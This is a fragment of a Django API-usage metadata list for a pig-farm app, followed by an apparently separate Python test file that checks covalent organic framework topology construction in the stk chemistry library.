}, { "api_name": "django.db.models.Sum", "line_number": 620, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 621, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 621, "usage_type": "name" }, { "api_name": "django.db.models.F", "line_number": 631, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 632, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 633, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 634, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 639, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 640, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 647, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 651, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 656, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 694, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 695, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 696, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 699, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 699, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 699, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 700, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 700, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 700, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 705, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 706, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 707, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 707, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 708, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 709, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 710, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 710, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 716, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 717, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 718, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 718, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 720, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 721, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 722, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 722, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 724, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 725, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 726, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 726, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 745, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 746, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 747, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 747, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 752, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 754, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 757, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 758, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 761, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 763, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 763, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 764, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 768, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 769, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 772, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 772, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 773, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 776, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 776, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 777, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 781, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 782, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 785, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 785, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 786, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 790, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 790, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 791, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 795, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 796, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 800, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 800, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 801, "usage_type": "call" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 805, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 805, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 806, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 813, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 814, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 819, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 819, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 820, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 824, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 825, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 826, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 826, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 827, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 828, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 828, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 829, "usage_type": "call" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 833, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 833, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 834, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 838, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 839, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 840, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 840, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 841, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 842, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 842, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 843, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 849, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 862, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 862, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 863, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 865, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 869, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 873, "usage_type": "call" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 873, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 873, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 874, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 877, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 881, "usage_type": "call" }, { "api_name": "core.models.Round", "line_number": 885, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 885, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 885, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 886, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 887, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 887, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 887, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 888, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 888, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 889, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 889, "usage_type": "name" }, { "api_name": "django.db.models.F", "line_number": 893, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 894, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 894, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 895, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 895, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 895, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 896, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 897, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 897, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 897, "usage_type": "name" }, { "api_name": "django.db.models.F", "line_number": 898, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 899, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 900, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 901, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 901, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 901, "usage_type": "name" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 908, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 908, "usage_type": "call" }, { "api_name": "sows_events.models.SowFarrow.objects.filter", "line_number": 912, "usage_type": "call" }, { "api_name": "sows_events.models.SowFarrow", "line_number": 912, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 912, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 912, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 916, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 917, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 918, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 919, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 920, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 924, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 925, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 926, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 928, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 929, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 930, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 930, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 930, "usage_type": "name" }, { "api_name": "core.models.CoreModelManager", "line_number": 934, "usage_type": "name" }, { "api_name": "datetime.datetime.strptime", "line_number": 940, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 940, "usage_type": "attribute" }, { "api_name": "django.utils.timezone.now", "line_number": 958, "usage_type": "call" }, { "api_name": "django.utils.timezone", "line_number": 958, "usage_type": "name" }, { "api_name": "django.utils.timezone.now", "line_number": 961, "usage_type": "call" }, { "api_name": "django.utils.timezone", "line_number": 961, "usage_type": "name" }, { "api_name": "datetime.datetime.strptime", "line_number": 972, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 972, "usage_type": "attribute" }, { "api_name": "datetime.timedelta", "line_number": 973, "usage_type": "call" }, { "api_name": "piglets.values_list", "line_number": 981, "usage_type": "call" }, { "api_name": "core.models.CoreModel", "line_number": 984, "usage_type": "name" }, { "api_name": "django.db.models.DateTimeField", "line_number": 985, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 985, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 986, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 986, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 987, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 987, "usage_type": "name" }, { "api_name": "django.utils.timezone.now", "line_number": 996, "usage_type": "call" }, { "api_name": "django.utils.timezone", "line_number": 996, "usage_type": "name" }, { "api_name": "datetime.timedelta", "line_number": 996, "usage_type": "call" }, { "api_name": "django.utils.timezone.now", "line_number": 1001, "usage_type": "call" }, { "api_name": "django.utils.timezone", "line_number": 1001, "usage_type": "name" }, { "api_name": "core.models.CoreModelManager", "line_number": 1005, "usage_type": "name" }, { "api_name": "core.models.CoreModel", "line_number": 1009, "usage_type": "name" }, { "api_name": "django.db.models.OneToOneField", "line_number": 1010, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1010, "usage_type": "name" }, { "api_name": "django.db.models.CASCADE", "line_number": 1010, "usage_type": "attribute" }, { "api_name": "django.db.models.ForeignKey", "line_number": 1011, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1011, "usage_type": "name" }, { "api_name": "django.db.models.SET_NULL", "line_number": 1011, "usage_type": "attribute" }, { "api_name": "django.db.models.QuerySet", "line_number": 1036, "usage_type": "attribute" }, { "api_name": "django.db.models", "line_number": 1036, "usage_type": "name" }, { "api_name": "django.db.models.Sum", "line_number": 1038, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1038, "usage_type": "name" }, { "api_name": "core.models.CoreModelManager", "line_number": 1044, "usage_type": "name" }, { "api_name": "django.db.models.F", "line_number": 1066, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1066, "usage_type": "name" }, { "api_name": "core.models.CoreModel", "line_number": 1069, "usage_type": "name" }, { "api_name": "django.db.models.ForeignKey", "line_number": 1070, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1070, "usage_type": "name" }, { "api_name": "django.db.models.CASCADE", "line_number": 1070, "usage_type": "attribute" }, { "api_name": "django.db.models.ForeignKey", "line_number": 1071, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1071, "usage_type": "name" }, { "api_name": "django.db.models.CASCADE", "line_number": 1071, "usage_type": "attribute" }, { "api_name": "django.db.models.FloatField", "line_number": 1072, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1072, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1073, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1073, "usage_type": "name" }, { "api_name": "django.db.models.TextField", "line_number": 1074, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1074, "usage_type": "name" }, { "api_name": "django.db.models.QuerySet", "line_number": 1089, "usage_type": "attribute" }, { "api_name": "django.db.models", "line_number": 1089, "usage_type": "name" }, { "api_name": "sows_events.models.SowFarrow.objects.filter", "line_number": 1123, "usage_type": "call" }, { "api_name": "sows_events.models.SowFarrow", "line_number": 1123, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 1123, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 1123, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 1125, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 1128, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 1129, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 1130, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 1131, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 1131, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 1134, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1134, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 1135, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 1135, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 1136, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1136, "usage_type": "name" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 1141, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 1141, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 1142, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 1144, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 1147, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 1148, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 1149, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 1150, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 1150, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 1152, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1152, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 1153, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 1154, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 1155, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 1156, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 1158, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1158, "usage_type": "name" }, { "api_name": "django.db.models.Sum", "line_number": 1162, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 1163, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1164, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1165, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1166, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1167, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1168, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 1173, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 1173, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 1174, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 1175, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1175, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 1177, "usage_type": "call" }, { "api_name": "django.db.models.functions.Round", "line_number": 1177, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 1178, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 1179, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1179, "usage_type": "name" }, { "api_name": "django.db.models.Sum", "line_number": 1184, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 1185, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 1186, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1187, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1188, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1189, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1190, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 1191, "usage_type": "call" }, { "api_name": "core.models.CoreModel", "line_number": 1214, "usage_type": "name" }, { "api_name": "django.db.models.OneToOneField", "line_number": 1215, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1215, "usage_type": "name" }, { "api_name": "django.db.models.SET_NULL", "line_number": 1215, "usage_type": "attribute" }, { "api_name": "django.db.models.CharField", "line_number": 1217, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1217, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1218, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1218, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1219, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1219, "usage_type": "name" }, { "api_name": "django.db.models.BooleanField", "line_number": 1221, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1221, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1224, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1224, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1225, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1225, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1226, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1226, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1227, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1227, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1228, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1228, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1229, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1229, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1230, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1230, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1233, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1233, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1234, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1234, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1235, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1235, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1236, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1236, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1237, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1237, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1238, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1238, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1239, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1239, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1243, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1243, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1244, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1244, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1245, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1245, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1246, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1246, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1247, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1247, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1248, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1248, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1249, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1249, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1252, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1252, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1253, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1253, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1254, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1254, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1255, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1255, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1256, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1256, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1257, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1257, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1258, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1258, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1261, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1261, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1262, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1262, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1263, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1263, "usage_type": "name" }, { "api_name": "django.db.models.IntegerField", "line_number": 1264, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1264, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1265, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1265, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1266, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1266, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 1267, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 1267, "usage_type": "name" } ]
344846077
import stk import os from collections import namedtuple from os.path import join import numpy as np from ..._test_utilities import _test_dump_and_load, _compare_with_valid test_dir = 'cof_topology_tests_output' if not os.path.exists(test_dir): os.mkdir(test_dir) def _alignment(vertex, building_block, vertices, edges): fg_position = building_block.get_centroid( atom_ids=building_block.func_groups[0].get_bonder_ids() ) v1 = stk.normalize_vector(fg_position - vertex.get_position()) def inner(edge_id): edge_position = edges[edge_id].get_position(vertex, vertices) v2 = edge_position - vertex.get_position() return v1 @ stk.normalize_vector(v2) return inner def _test_placement(vertex, bb, vertices, edges): vertex.place_building_block(bb, vertices, edges) assert np.allclose( a=bb.get_centroid(bb.get_bonder_ids()), b=vertex.get_position(), atol=1e-8 ) aligned = max( vertex.get_edge_ids(), key=_alignment(vertex, bb, vertices, edges) ) vertex_edges = list(vertex.get_edge_ids()) assert aligned == vertex_edges[vertex.get_aligner_edge()] def _angle(bb, edge, vertex, vertices): edge_vector = ( edge.get_position(vertex, vertices) - bb.get_centroid(bb.get_bonder_ids()) ) def inner(fg_id): fg = bb.func_groups[fg_id] fg_vector = ( bb.get_centroid(fg.get_bonder_ids()) - bb.get_centroid(bb.get_bonder_ids()) ) return stk.vector_angle(fg_vector, edge_vector) return inner def _test_assignment(vertex, bb, vertices, edges): assignments = ( vertex.assign_func_groups_to_edges(bb, vertices, edges) ) vertex_edges = list(vertex.get_edge_ids()) assert assignments[0] == vertex_edges[vertex.get_aligner_edge()] for edge_id in vertex.get_edge_ids(): closest = min( range(len(bb.func_groups)), key=_angle(bb, edges[edge_id], vertex, vertices) ) assert assignments[closest] == edge_id if len(bb.func_groups) == 2: not_aligner = next( e for e in vertex.get_edge_ids() if e != vertex_edges[vertex.get_aligner_edge()] ) assert assignments[1] == not_aligner def test_vertex( tmp_amine2, tmp_aldehyde3, tmp_aldehyde4_alt2, tmp_aldehyde6 ): topology_graphs = ( stk.cof.Honeycomb((2, 2, 1)), stk.cof.Hexagonal((2, 2, 1)), stk.cof.Square((2, 2, 1)), stk.cof.Kagome((2, 2, 1)), stk.cof.LinkerlessHoneycomb((2, 2, 1)) ) building_blocks = { 2: tmp_amine2, 3: tmp_aldehyde3, 4: tmp_aldehyde4_alt2, 6: tmp_aldehyde6 } for topology_graph in topology_graphs: vertices = topology_graph.vertices edges = topology_graph.edges for vertex in topology_graph.vertices: bb = building_blocks[vertex.get_num_edges()] _test_placement(vertex, bb, vertices, edges) _test_assignment(vertex, bb, vertices, edges) def _test_construction( cof, num_expected_bbs, num_unreacted_fgs, periodic ): is_periodic = '_periodic' if periodic else '' path = join( test_dir, f'{cof.topology_graph.__class__.__name__}{is_periodic}.mol' ) cof.write(path) for bb in cof.get_building_blocks(): assert cof.building_block_counter[bb] == num_expected_bbs[bb] # This test only holds true when each building block is # involved in every construction bond and the cof is # periodic. is_periodic = all( num == 0 for num in num_unreacted_fgs.values() ) if len(num_expected_bbs) < 3 and is_periodic: assert ( len(cof.construction_bonds) == cof.building_block_counter[bb] * len(bb.func_groups) ) # Check that the correct number of bonds got made. assert ( len(cof.construction_bonds) == # For every 2 unreacted functional groups there should be one # less construction bond. len(cof.topology_graph.edges)-sum(num_unreacted_fgs.values())/2 ) # Check correct total number of atoms. num_deleters = sum( len(fg.deleters)*cof.building_block_counter[bb] for bb in cof.get_building_blocks() for fg in bb.func_groups ) # Remove the deleters from all the uncreated functional groups. # This assumes that all functional groups in a building block are # the same. num_deleters -= sum( len(bb.func_groups[0].deleters) for bb in num_unreacted_fgs for i in range(num_unreacted_fgs[bb]) ) num_bb_atoms = sum( len(bb.atoms)*cof.building_block_counter[bb] for bb in cof.get_building_blocks() ) assert len(cof.atoms) == num_bb_atoms - num_deleters # Check correct total number of bonds. num_bb_bonds = sum( len(bb.bonds)*cof.building_block_counter[bb] for bb in cof.get_building_blocks() ) assert ( len(cof.bonds) == num_bb_bonds + len(cof.construction_bonds) - num_deleters ) def test_alignments(amine2_alt3, aldehyde4_alt1, 